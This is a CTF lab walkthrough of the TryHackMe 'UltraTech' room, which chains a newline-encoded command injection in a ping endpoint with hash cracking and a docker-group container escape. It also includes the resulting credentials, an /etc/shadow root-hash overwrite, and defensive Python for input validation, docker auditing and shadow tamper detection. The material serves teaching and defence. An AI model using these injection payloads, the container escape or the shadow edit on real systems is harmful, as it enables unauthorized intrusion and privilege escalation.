
THM - UltraTech

UltraTech - A walkthrough of the challenge with enumeration, exploitation and privilege escalation steps.




NMAP

```bash
nmap 10.10.200.110 -p- -T5
```

image1

```bash
nmap 10.10.200.110 -p 31331 -A
```

image2

- Directory bruteforcing:

```bash
gobuster dir -u http://10.10.200.110:8081 -w /usr/share/seclists/Discovery/Web-Content/big.txt
```

image3

```bash
gobuster dir -u http://10.10.200.110:31331 -w /usr/share/seclists/Discovery/Web-Content/big.txt
```

image4

/robots.txt

image5

/utech_sitemap.txt

image6

/partners.html

image7

Got a login page

- Looking at the traffic in Burp while browsing http://10.10.200.110:31331/partners.html:

The page constantly calls a ping endpoint to check whether the server is online.

image8

- Changing the `ip` parameter of that GET request, we get RCE (command injection):

URL encoding cheatsheet:

- A normal space is URL-encoded as %20.
- A line feed (0x0A, the `\n` character, which moves to the next line) is URL-encoded as %0A.
- The injected command has to be separated with a URL-encoded line feed (`\n` = %0A), because a normal space does not work here.

```http
GET /ping?ip=10.10.200.110%0Als
```

image9
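The reason a space fails while a newline works is a common input-validation failure mode, so here is the vulnerable handler shape beside a hardened one. This is an added illustration, not the room's server code (which the page does not show): it assumes the handler URL-decodes the `ip` query value and runs `ping -c 1 <value>` through a shell, and the `blocklist_filter` is a hypothetical check that rejects spaces and common separators but forgets the newline.

```python
"""Why the /ping endpoint is injectable, and how to close the hole.

Illustration added for this write-up; the room's real server code is not
shown on the page. Assumed handler shape: it URL-decodes the ``ip`` query
value and runs ``ping -c 1 <value>`` through a shell.
"""
import ipaddress
import re
from typing import List
from urllib.parse import unquote


def blocklist_filter(raw_ip: str) -> bool:
    """Hypothetical weak input check: it rejects spaces and the obvious
    shell separators, but a newline also terminates a shell command and
    is not on the list. That gap is exactly why %20 fails and %0A works."""
    decoded = unquote(raw_ip)
    return re.search(r"[ ;&|`$]", decoded) is None


def vulnerable_command(raw_ip: str) -> str:
    """The string a naive handler would pass to ``sh -c``. Once the value
    contains a decoded newline, the shell sees two commands."""
    decoded = unquote(raw_ip)
    if not blocklist_filter(raw_ip):
        raise ValueError("rejected by blocklist")
    return f"ping -c 1 {decoded}"


def hardened_argv(raw_ip: str) -> List[str]:
    """Allow-list version: the value must parse as an IP address, and it is
    passed as its own argv element, so no shell ever interprets it.
    Run it with ``subprocess.run(hardened_argv(raw), shell=False)``."""
    decoded = unquote(raw_ip)
    try:
        addr = ipaddress.ip_address(decoded)  # ValueError for anything else
    except ValueError as exc:
        raise ValueError(f"not an IP address: {decoded!r}") from exc
    return ["ping", "-c", "1", str(addr)]


def hardened_accepts(raw_ip: str) -> bool:
    """True only if the hardened check lets the value through."""
    try:
        hardened_argv(raw_ip)
        return True
    except ValueError:
        return False


if __name__ == "__main__":
    for raw in ("10.10.200.110", "10.10.200.110%20ls", "10.10.200.110%0Als"):
        print(f"{raw!r}: blocklist={blocklist_filter(raw)} hardened={hardened_accepts(raw)}")
```

The takeaway for the fix is the last function: parse the input into the type you actually expect (an address), and hand it to the process as an argv element rather than as shell text, which makes the whole encoding question irrelevant.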

```http
GET /ping?ip=10.10.200.110%0Acat%20utech.db.sqlite
```

image10

(ignore the M before the names)

Found hashes:

r00t : f357a0c52799563c7c7b76c1e7543a32

admin : 0d0ea5111e3c1def594c1684e3b9be84

```bash
hash-identifier
```

image11

image12

- Crack with hashcat:

```bash
hashcat -m 0 -a 0 hashes /usr/share/wordlists/rockyou.txt
```
![image13](../resources/ce79b4f12e29423b8e2f3a9ee2f41500.png)

- Credentials:
**r00t : n100906**

**admin : mrsheafy**

- SSH with r00t

![image14](../resources/2b769bfa5fdc49cc8c8f54a4bab7f530.png)


![image15](../resources/95fc6f33053545219c13463a93df6f13.png)
- We can see we are in the docker group

- **<u>Escape the container:</u>**

```bash
docker images
```

image16

image17

- If we run this command, we get an error:

image18

- So we need to list the available images:

```bash
docker ps -a
```

image19

- Change the image name to bash

Option 1 - command:

```bash
docker run -v /:/mnt --rm -it bash chroot /mnt sh
```

This command creates a new container from the bash image, bind-mounts the entire ultratech-prod filesystem (/) at /mnt inside the container, and then chroots into /mnt, so the shell we get operates directly on the host's filesystem as root.

image20

Option 2 - command:

```bash
docker run -v /:/mnt -it bash
```

This does the same as Option 1 (a new container with the entire ultratech-prod filesystem / bind-mounted), but without the chroot, so the host filesystem is reached under /mnt inside the container.

image21

image22

- We are root (in the container)
- We can now read all the root files
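From the defender's side, the two conditions chained above (a non-root user in the docker group, and a container that bind-mounts the host's /) are both cheap to audit. The following is an added example, not part of the room; the /etc/group text and the `docker inspect` JSON are constructed samples shaped like the real files, not data from the box.

```python
"""Audit checks for the two conditions this box chains together: a non-root
user in the docker group, and a container that bind-mounts the host's root
filesystem. Added example, not part of the room; the /etc/group text and the
``docker inspect`` JSON below are constructed samples shaped like the real
files, not data from the box.
"""
import json
from typing import Dict, List

SAMPLE_ETC_GROUP = """\
root:x:0:
sudo:x:27:
docker:x:999:r00t
ssh:x:110:
"""

# Constructed, but follows the HostConfig/Mounts layout of ``docker inspect``.
SAMPLE_INSPECT = json.dumps([
    {"Name": "/c1",
     "Config": {"Image": "bash"},
     "HostConfig": {"Privileged": False},
     "Mounts": [{"Type": "bind", "Source": "/", "Destination": "/mnt"}]},
    {"Name": "/web",
     "Config": {"Image": "nginx"},
     "HostConfig": {"Privileged": False},
     "Mounts": [{"Type": "bind", "Source": "/srv/www",
                 "Destination": "/usr/share/nginx/html"}]},
])

# Host paths that hand a container full control of the host when bind-mounted.
SENSITIVE_HOST_PATHS = {"/", "/etc", "/root", "/var/run/docker.sock"}


def docker_group_members(etc_group: str) -> List[str]:
    """Users in the docker group. Each of them can do what this walkthrough
    does (mount / into a container as root), so treat the list like sudoers."""
    for line in etc_group.splitlines():
        fields = line.split(":")
        if len(fields) == 4 and fields[0] == "docker":
            return [user for user in fields[3].split(",") if user]
    return []


def risky_containers(inspect_json: str) -> Dict[str, List[str]]:
    """Container name -> reasons it grants host access (privileged flag or a
    bind mount of a sensitive host path)."""
    findings: Dict[str, List[str]] = {}
    for container in json.loads(inspect_json):
        reasons = []
        if container.get("HostConfig", {}).get("Privileged"):
            reasons.append("privileged container")
        for mount in container.get("Mounts", []):
            source = mount.get("Source", "")
            normalized = source.rstrip("/") or "/"
            if mount.get("Type") == "bind" and normalized in SENSITIVE_HOST_PATHS:
                reasons.append(f"host {normalized} bind-mounted at {mount.get('Destination')}")
        if reasons:
            findings[container["Name"].lstrip("/")] = reasons
    return findings


if __name__ == "__main__":
    print("docker group:", docker_group_members(SAMPLE_ETC_GROUP))
    print("risky containers:", risky_containers(SAMPLE_INSPECT))
```

On a live host you would feed `docker_group_members` the real /etc/group and `risky_containers` the output of `docker inspect $(docker ps -aq)`; any user the first function returns should be treated as an administrator, and anything the second flags is a container that already owns the host.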

- To get root on the host machine (using Option 1):

- On Kali, make an MD5 hash:

```bash
mkpasswd -m md5 pass123
```

image23

- On the target, in the container (because we're root now):

```bash
vi /etc/shadow
```

Press i (for insert)

Remove the hash of the root user (the second field) and replace it with the hash you made.

image24

Press ESC, type :wq and press ENTER to save and quit.

- Exit out of the container:

```bash
exit
```

- Switch to root on the host with the password you made:

```bash
su root
```

image25

image26
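The hand-edit of /etc/shadow leaves two forensic tells: root's hash changes without the last-change day (third field) moving, which `passwd` would have updated, and the new hash is md5crypt (`mkpasswd -m md5` emits `$1$...` hashes) where a modern system uses sha512crypt or yescrypt. The checker below is an added example, not part of the room; the shadow lines are constructed, not the box's real values.

```python
"""Detect the root-password swap from this walkthrough: compare the root
entry of /etc/shadow against a baseline copy and flag legacy hash types.
Added example; the shadow lines below are constructed, not the box's real
values. ``mkpasswd -m md5`` produces md5crypt hashes, which start with $1$.
"""
from typing import Dict, List, Tuple

HASH_PREFIXES = {
    "$1$": "md5crypt",
    "$2": "bcrypt",
    "$5$": "sha256crypt",
    "$6$": "sha512crypt",
    "$y$": "yescrypt",
}

# Constructed baseline (e.g. from a backup or a file-integrity snapshot).
BASELINE_SHADOW = """\
root:$6$c0nstructedSalt$c0nstructedHashOfTheOriginalRootPassword:18500:0:99999:7:::
r00t:$6$c0nstructedSalt$c0nstructedHashOfR00t:18500:0:99999:7:::
"""

# Constructed "after" state: root's hash replaced by hand, day field untouched.
CURRENT_SHADOW = """\
root:$1$c0nstruc$c0nstructedMd5cryptHash:18500:0:99999:7:::
r00t:$6$c0nstructedSalt$c0nstructedHashOfR00t:18500:0:99999:7:::
"""


def parse_shadow(text: str) -> Dict[str, Tuple[str, str]]:
    """user -> (hash field, last-change day) for every well-formed line."""
    entries: Dict[str, Tuple[str, str]] = {}
    for line in text.splitlines():
        fields = line.split(":")
        if len(fields) >= 3 and fields[0]:
            entries[fields[0]] = (fields[1], fields[2])
    return entries


def hash_algorithm(hash_field: str) -> str:
    """Name the crypt scheme from the $id$ prefix; '!' or '*' means locked."""
    for prefix, name in HASH_PREFIXES.items():
        if hash_field.startswith(prefix):
            return name
    return "locked/unknown"


def audit_shadow(baseline: str, current: str, user: str = "root") -> List[str]:
    """Findings for one account; an empty list means nothing suspicious."""
    old = parse_shadow(baseline).get(user)
    new = parse_shadow(current).get(user)
    if old is None or new is None:
        return [f"{user} missing from one of the files"]
    old_hash, old_day = old
    new_hash, new_day = new
    findings: List[str] = []
    if old_hash != new_hash:
        findings.append(f"{user} password hash changed")
        # passwd rewrites the last-change day; a direct file edit does not.
        if old_day == new_day:
            findings.append(
                f"{user} last-change day unchanged: hash was edited directly, not via passwd"
            )
    algorithm = hash_algorithm(new_hash)
    if algorithm == "md5crypt":
        findings.append(f"{user} hash uses legacy {algorithm}")
    return findings


if __name__ == "__main__":
    for finding in audit_shadow(BASELINE_SHADOW, CURRENT_SHADOW):
        print("FINDING:", finding)
```

In practice the baseline comes from a file-integrity tool or an offline copy; the point of the day-field check is that it separates a legitimate password change from a write to the file itself, which is also what an audit rule on /etc/shadow (for example an auditd watch) would catch at the time it happens.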

This post is licensed under CC BY 4.0 by the author.